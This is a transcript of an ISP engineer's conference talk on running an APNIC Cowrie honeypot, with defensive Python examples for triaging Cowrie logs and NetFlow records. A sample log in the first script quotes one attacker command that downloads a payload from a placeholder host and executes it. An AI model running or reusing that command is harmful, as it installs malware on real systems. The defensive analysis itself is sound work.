The document discusses using honeypots for network security analysis. It begins with background on honeypots, explaining that they are decoy systems meant to attract cyber attacks. It then discusses the threat intelligence gathered from a honeypot, including unique source IPs, attacked ports, downloaded scripts and their origins, and the affected internal IPs. It notes that the devices most often seen were outdated MikroTik, Zyxel and Netgear routers and DVR systems. The document concludes with the internal analysis and the challenge of convincing a client that they have an issue after honeypot alerts.
Mr. Donald Rumsfeld, former Defense Secretary of the USA, stated in his book "Known and Unknown: A Memoir" that "There are known knowns, things we know that we know; and there are known unknowns, things that we know we don't know. But there are also unknown unknowns, things we do not know we don't know." And to know the unknowns of the unknown, my journey with the APNIC honeynet project started, and I am going to share my experiences here in this talk.
Having Honeypot for Better Network Security Analysis
1. Having Honeypot for Better Network Security Analysis
A journey with the APNIC honeypot
A. S. M. Shamim Reza
Link3 Technologies Limited
shamimreza@link3.net
3. Honeypot – what is it?
“A honeypot is a sacrificial computer system that's intended to attract cyber-attacks, like a decoy. It mimics a target for hackers, and uses their intrusion attempts to gain information about cyber-criminals and the way they are operating, or to distract them from other targets.”
– Kaspersky Lab
4. Honeypot – what is it?
Honeypots are classified by interaction level as:
– Low-interaction honeypot
– Medium-interaction honeypot
– High-interaction honeypot
“Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker.”
– Michel Oosterhof
5. Background history
– The idea of honeypots began in 1989 with the publication of “The Cuckoo’s Egg” by Clifford Stoll.
– The first ever honeypot was released in 1997, called the Deception Toolkit.
– In 1998 the first commercial honeypot came out, called CyberCop Sting.
6. Background history
– My own interest started at bdNOG 1 in 2014.
– Planned to host it at Link3 during APRICOT 25 (2020).
– Influenced by Adli Wahid, Senior Internet Security Specialist, APNIC.
Link3 has hosted the APNIC honeypot as part of the ongoing “SOC” project.
7. Honeypot – questions to ask !!!
Motivations
• What is the primary purpose of the honeypot?
• What are you trying to protect?
• Are you interested in all attacks, or just the ones that could be successful?
• Are you interested in learning how the hacker or malware was initially successful?
• Are you interested in identifying the hacker or the origination point of the malware?
• Are you interested in what the hacker or malware did (or wanted to do) after the initial exploit gained entrance to the honeypot?
• Are you interested in what tools, techniques, or tactics were used?
Based on this brainstorming, you can decide which sort of honeypot you are going to work with.
*** Honeypot Data Analysis. In: Honeypots for Windows – Roger A. Grimes
8. Honeypot – how is it useful?
Analyzing the traffic towards the honeypot helps you learn
– where the cyber-criminals are coming from
– the level of threat
– what methods they are using
– what data or applications they are interested in
– how well your security measures are working to stop cyber-attacks
Who hosts honeypots?
– Large organizations
– Security researchers
11. Threat Intel ?
Those URLs ?? hxxp://1.2.3.4/bot.x86_64
– Reported as a C2 server
– since June 2020
12. Threat Intel ?
Those URLs ?? hxxp://1.2.3.4/bot.x86_64
– I needed to know the details of these files, so I submitted them to Hybrid Analysis.
And Kaspersky Lab says: “Usually malware of this family is used to perform DDoS attacks.”
13. Threat Intel ?
Those URLs ??
hxxp://2.3.4.5/div
hxxp://2.3.4.5/miner.sh
These TWO scripts were downloaded by an outside IP – 213.202.233.171
Open ports – 22 80 443
14. Threat Intel ?
Those URLs ?? (hxxp://2.3.4.5/div, hxxp://2.3.4.5/miner.sh, fetched by 213.202.233.171, continued)
First report – 18 August 2020
Last report – 25 August 2020
– Mostly scans for the SSH port
– The patterns show they are looking for honeypots.
18. Threat Intel ?
Those URLs ?? (hxxp://2.3.4.5/div, hxxp://2.3.4.5/miner.sh, continued)
This IP in the USA serves the scripts, and the script in turn downloads another 10 scripts from Canada.
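The URLs, source IPs, first/last-seen dates and payload origins on these slides all come out of Cowrie's JSON log. The script below is an added example (not code from the deck and not part of Cowrie) that pulls those same facts out of cowrie.json: per attacker IP, the first and last sighting, the honeypot port hit, the credentials that worked, the commands typed and the URLs fetched, defanged to the hxxp://2[.]3[.]4[.]5/… form so they can be pasted into a ticket (the deck defangs only the scheme; bracketing the dots is a stricter convention). The event names and field names are Cowrie's own; the log lines, session IDs, attacker addresses (documentation ranges) and the shortened shasum values are constructed for this example.

```python
"""Triage of Cowrie JSON logs: who logged in, what they ran, what they fetched (added example)."""
import json
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Cowrie's cowrie.json format; payload hosts reuse the deck's
# placeholders (1.2.3.4, 2.3.4.5), attacker IPs are documentation addresses, shasums are shortened.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51234,"dst_port":22,"session":"a1b2c3d4","timestamp":"2020-08-18T03:14:07.123456Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2020-08-18T03:14:08.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2020-08-18T03:14:09.000000Z"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://2.3.4.5/div; chmod +x div; ./div","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2020-08-18T03:14:10.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://2.3.4.5/div","outfile":"dl/0b9c1d2e3f","shasum":"0b9c1d2e3f","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2020-08-18T03:14:11.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":52001,"dst_port":22,"session":"c9d0e1f2","timestamp":"2020-08-25T09:40:10.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://2.3.4.5/miner.sh","outfile":"dl/7e8f9a0b1c","shasum":"7e8f9a0b1c","src_ip":"203.0.113.7","session":"c9d0e1f2","timestamp":"2020-08-25T09:40:12.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.42","src_port":40000,"dst_port":23,"session":"e5f6a7b8","timestamp":"2020-06-03T22:01:00.000000Z"}
{"eventid":"cowrie.login.success","username":"admin","password":"admin","src_ip":"198.51.100.42","session":"e5f6a7b8","timestamp":"2020-06-03T22:01:01.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://1.2.3.4/bot.x86_64","outfile":"dl/aa11bb22cc","shasum":"aa11bb22cc","src_ip":"198.51.100.42","session":"e5f6a7b8","timestamp":"2020-06-03T22:01:03.000000Z"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.42","session":"e5f6a7b8","timestamp":"2020-06-03T22:01:05.000000Z"}
"""

URL_RE = re.compile(r"""(?:https?|ftp|tftp)://[^\s;"'|&<>()]+""")


def parse_events(text):
    """One JSON object per line; a truncated line (log rotated mid-write) is skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def defang(url):
    """hxxp://2[.]3[.]4[.]5/div style, so a URL pasted into a ticket or chat cannot be clicked."""
    scheme, sep, rest = url.partition("://")
    if scheme.startswith("http"):
        scheme = "hxxp" + scheme[4:]
    host, slash, path = rest.partition("/")
    return scheme + sep + host.replace(".", "[.]") + slash + path


def _ts(value):
    return datetime.strptime(value[:19], "%Y-%m-%dT%H:%M:%S")


def summarize(events):
    """Per attacker IP: first/last seen, honeypot ports hit, working creds, commands, fetched URLs."""
    per_ip = {}
    for ev in events:
        ip = ev.get("src_ip")
        if not ip or "timestamp" not in ev:
            continue
        rec = per_ip.setdefault(ip, {"first_seen": None, "last_seen": None, "ports": set(),
                                     "creds": set(), "commands": [], "downloads": {}})
        ts = _ts(ev["timestamp"])
        rec["first_seen"] = ts if rec["first_seen"] is None else min(rec["first_seen"], ts)
        rec["last_seen"] = ts if rec["last_seen"] is None else max(rec["last_seen"], ts)
        eid = ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            rec["ports"].add(ev.get("dst_port"))
        elif eid == "cowrie.login.success":
            rec["creds"].add((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            rec["commands"].append(cmd)
            for url in URL_RE.findall(cmd):            # URL typed, possibly never fetched
                rec["downloads"].setdefault(defang(url), None)
        elif eid == "cowrie.session.file_download" and ev.get("url"):
            rec["downloads"][defang(ev["url"])] = ev.get("shasum")   # SHA-256 of the captured file
    return per_ip


def payload_hosts(per_ip):
    """Invert the view: which payload host served which attacker IPs (the 'origin' question)."""
    hosts = defaultdict(set)
    for ip, rec in per_ip.items():
        for url in rec["downloads"]:
            hosts[url.partition("://")[2].partition("/")[0]].add(ip)
    return {host: sorted(ips) for host, ips in hosts.items()}


def report(per_ip):
    lines = [f"unique attacker IPs: {len(per_ip)}"]
    for ip, rec in sorted(per_ip.items()):
        ports = sorted(p for p in rec["ports"] if p is not None)
        lines.append(f"{ip}  first {rec['first_seen']:%Y-%m-%d}  last {rec['last_seen']:%Y-%m-%d}  ports {ports}")
        for user, pw in sorted(rec["creds"]):
            lines.append(f"    login ok: {user}/{pw}")
        for url, sha in rec["downloads"].items():
            lines.append(f"    fetched: {url}  sha256={sha or 'not captured'}")
    return "\n".join(lines)


if __name__ == "__main__":
    summary = summarize(parse_events(SAMPLE_LOG))
    print(report(summary))
    print("payload hosts:", payload_hosts(summary))
```

The report is the same shape as slides 11 to 18: one line per attacker IP with its first and last report dates and port, then the credentials that worked and the defanged URLs with the hash of what Cowrie actually captured. The hash is what goes to a sandbox such as Hybrid Analysis; the URL itself is never fetched from the analyst's workstation, which is the point of slide 19.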
19. Threat Intel ?
A few things to remember while working with a honeypot or similar:
1. All of those script checks were performed in a strict lab environment.
2. The Nmap scan and the web-URL check followed the same procedure (as in 1).
3. If you do not take proper precautions, things might get worse and accidentally make you the victim.
20. What about the internals !!!
What I do when I get a notification in Slack:
– Run an nmap scan to get the port/service info of the device associated with the IP.
– Search the DNS query history for the respective IP.
– Look up the type of client in our client database.
– The tricky part is convincing the client, so that I can get NetFlow or packet-capture data accordingly.
– Analyze the data and try to find out the story behind it.
– Recommend some best practices to the respective client accordingly.
21. What about the internals !!!
Devices related to those 57 IPs (so let us watch a story on the next few slides):
Device Name        Version              %
MikroTik Router    < 6.46.6             92%
Zyxel Router       outdated firmware    2.1%
DVR System         outdated firmware    4.2%
Netgear Router     outdated firmware    1.78%
22. What about the internals !!! one CCIE got it covered?
– Slack gave me an alert, and I let my CS team know to work on that particular client.
– 2 days later I got an alert for the same IP; again I knocked on my CS team to work on it.
– 1 day later I got the alert again, and then I asked our CS team whether they had worked on it or not.
– They replied that on the second day the client's IT contact had answered: “I am a CCIE, I know what is happening in my network, you guys don't have to bother me again and again.”
So the challenge begins for me → → →
[192.168.0.133 ← the user's IP, faked for demonstration purposes]
24. What about the internals !!! what I was doing?
So before going to him:
– Ran an nmap scan, and got this info →→→→→→→→
– At the same time, I set up a rule on my NetFlow server to give me the associated flow records:
Date first seen Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes pps bps Bpp Flows
2020-07-01 00:05:04.760 3.168 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 413 615089 130 1.6 M 1489 1
2020-07-01 00:05:05.754 1.504 TCP 192.168.0.133:80 -> 185.220.103.9:60310 ...AP..F 0 83 122394 55 651031 1474 1
2020-07-01 00:05:05.775 2.784 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 62 88548 22 254448 1428 1
2020-07-01 00:05:05.766 3.200 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...A.... 0 205 307500 64 768750 1500 1
2020-07-01 00:05:05.759 0.000 GRE 192.168.0.133:0 -> 103.92.153.42:0 ........ 0 1 28 0 0 28 1
2020-07-01 00:05:05.764 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 25 33531 9 99794 1341 1
2020-07-01 00:05:07.757 2.656 TCP 192.168.0.133:80 -> 185.220.103.9:35334 ...AP... 0 145 212395 54 639743 1464 1
2020-07-01 00:05:07.757 3.008 TCP 192.168.0.133:80 -> 185.220.103.9:60268 ...AP... 0 271 403745 90 1.1 M 1489 1
2020-07-01 00:05:08.764 2.592 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 98 142399 37 439503 1453 1
2020-07-01 00:05:08.775 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 37 52879 13 157377 1429 1
2020-07-01 00:05:08.762 2.080 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...AP..F 0 174 258552 83 994430 1485 1
2020-07-01 00:05:09.778 3.104 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 213 317835 68 819162 1492 1
Noticed something
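Two things stand out in the flow records above: every TCP flow is 192.168.0.133 answering from port 80 to the same external address, roughly 2.5 MB within about five seconds, and one flow is a single GRE packet from the same host to a different external address. The script below is an added example, not the author's NetFlow setup: it parses nfdump's default line format (including the "1.6 M" style counters, where the unit is a separate token) and applies exactly those two checks. The sample text is the deck's own table from the slide above (the internal address was already faked by the author); the set of tunnel protocols to flag and the 1 MB egress threshold are assumptions chosen for this example.

```python
"""nfdump line-format parser with two triage checks (added example; see lead-in)."""
from collections import defaultdict, namedtuple
from datetime import datetime

# The deck's own nfdump output (slide 25); 192.168.0.133 is the author's faked internal address.
SAMPLE_NFDUMP = """\
Date first seen Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes pps bps Bpp Flows
2020-07-01 00:05:04.760 3.168 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 413 615089 130 1.6 M 1489 1
2020-07-01 00:05:05.754 1.504 TCP 192.168.0.133:80 -> 185.220.103.9:60310 ...AP..F 0 83 122394 55 651031 1474 1
2020-07-01 00:05:05.775 2.784 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 62 88548 22 254448 1428 1
2020-07-01 00:05:05.766 3.200 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...A.... 0 205 307500 64 768750 1500 1
2020-07-01 00:05:05.759 0.000 GRE 192.168.0.133:0 -> 103.92.153.42:0 ........ 0 1 28 0 0 28 1
2020-07-01 00:05:05.764 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 25 33531 9 99794 1341 1
2020-07-01 00:05:07.757 2.656 TCP 192.168.0.133:80 -> 185.220.103.9:35334 ...AP... 0 145 212395 54 639743 1464 1
2020-07-01 00:05:07.757 3.008 TCP 192.168.0.133:80 -> 185.220.103.9:60268 ...AP... 0 271 403745 90 1.1 M 1489 1
2020-07-01 00:05:08.764 2.592 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 98 142399 37 439503 1453 1
2020-07-01 00:05:08.775 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 37 52879 13 157377 1429 1
2020-07-01 00:05:08.762 2.080 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...AP..F 0 174 258552 83 994430 1485 1
2020-07-01 00:05:09.778 3.104 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 213 317835 68 819162 1492 1
"""

Flow = namedtuple("Flow", "first_seen duration proto src_ip src_port dst_ip dst_port flags packets bytes bps flows")
UNITS = {"K": 1e3, "M": 1e6, "G": 1e9}


def _number(tokens, i):
    """Read one numeric column; nfdump prints large counters as two tokens, e.g. '1.6 M'."""
    value = float(tokens[i])
    i += 1
    if i < len(tokens) and tokens[i] in UNITS:
        value *= UNITS[tokens[i]]
        i += 1
    return value, i


def parse_line(line):
    """One IPv4 flow record in 'addr:port' form; None for the header line or a damaged line."""
    t = line.split()
    if len(t) < 12 or t[5] != "->":
        return None
    try:
        first_seen = datetime.strptime(t[0] + " " + t[1], "%Y-%m-%d %H:%M:%S.%f")
        src_ip, _, src_port = t[4].rpartition(":")
        dst_ip, _, dst_port = t[6].rpartition(":")
        i = 9                                   # t[7] is Flags, t[8] is Tos
        packets, i = _number(t, i)
        nbytes, i = _number(t, i)
        _pps, i = _number(t, i)
        bps, i = _number(t, i)
        _bpp, i = _number(t, i)
        flows, i = _number(t, i)
        return Flow(first_seen, float(t[2]), t[3], src_ip, int(src_port), dst_ip, int(dst_port),
                    t[7], int(packets), int(nbytes), bps, int(flows))
    except (ValueError, IndexError):
        return None


def parse_nfdump(text):
    return [f for f in (parse_line(line) for line in text.splitlines()) if f is not None]


def peer_summary(flows, internal_ip):
    """Bytes, packets, flows and protocols per external peer, for one internal host as source."""
    peers = defaultdict(lambda: {"bytes": 0, "packets": 0, "flows": 0, "protos": set()})
    for f in flows:
        if f.src_ip == internal_ip:
            p = peers[f.dst_ip]
            p["bytes"] += f.bytes
            p["packets"] += f.packets
            p["flows"] += f.flows
            p["protos"].add(f.proto)
    return dict(peers)


TUNNEL_PROTOS = {"GRE", "IPIP", "ESP", "AH"}   # assumption: a client LAN host should not build tunnels out


def find_anomalies(flows, internal_ip, egress_limit=1_000_000):
    """Flag tunnel protocols from the host, and web-server responses concentrated on one external peer."""
    findings = []
    served = defaultdict(int)      # bytes the host sent from a web-server port, per external peer
    for f in flows:
        if f.src_ip != internal_ip:
            continue
        if f.proto in TUNNEL_PROTOS:
            findings.append(f"{f.first_seen:%Y-%m-%d %H:%M:%S} tunnel protocol {f.proto} "
                            f"from {internal_ip} to {f.dst_ip} ({f.bytes} bytes)")
        if f.proto == "TCP" and f.src_port in (80, 443):
            served[f.dst_ip] += f.bytes
    for peer, total in sorted(served.items(), key=lambda kv: -kv[1]):
        if total >= egress_limit:
            findings.append(f"{total} bytes of HTTP(S) responses from {internal_ip} to a single peer {peer}")
    return findings


if __name__ == "__main__":
    records = parse_nfdump(SAMPLE_NFDUMP)
    for peer, p in peer_summary(records, "192.168.0.133").items():
        print(f"{peer:16} {p['bytes']:>9} bytes {p['flows']:>3} flows {sorted(p['protos'])}")
    for finding in find_anomalies(records, "192.168.0.133"):
        print("!!", finding)
```

Run as a script it prints the per-peer totals and the two findings for 192.168.0.133. In production the same checks would run over the output of an nfdump query filtered to the alerted address rather than over embedded text, with the egress threshold tuned to what that client's server normally serves; the point of the example is that both findings need only flow data, which is why the author could proceed without the client's packet capture.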
27. What about the internals !!! what I was doing?
– Searched the IP on AbuseDB and other places.
– The reputation was not good; actually, it was worse.
28. What about the internals !!! what I was doing?
So I had got what I needed to talk to him.
– The conversation went like … … …
– I finally managed to convince him that he is not responsible for anything; rather, something bad is happening and I am here only to help.
– But I didn't get any NetFlow or packet-capture data from him, so my only option was to keep monitoring the activity of that IP.
Update: since September 2020 I haven't had any hits from that IP.
30. So the benefits of having the APNIC honeypot in place
– Before having the APNIC honeypot in place, we didn't have any direct information about which IP, or which internal LAN behind it, is compromised.
– Though Cowrie covers only the SSH and Telnet services, the logs still give meaningful information to study, and we are planning to host some other honeypots as well.
– Since 2013/2014 we have been maintaining a strict security policy, which is fine-tuned on a regular basis.
– Hosting the APNIC honeypot is a low-cost solution.
– The infographic dashboard gives a broader view, for example which region is performing most of the attacks.
31. “There are known knowns, things we know that we know; and there are known unknowns, things that we know we don't know. But there are also unknown unknowns, things we do not know we don't know.”
Donald Rumsfeld, Known and Unknown: A Memoir
32. Thank you for your attention
Contact me: shamimrezasohag | asmshamimreza | sohag.shamim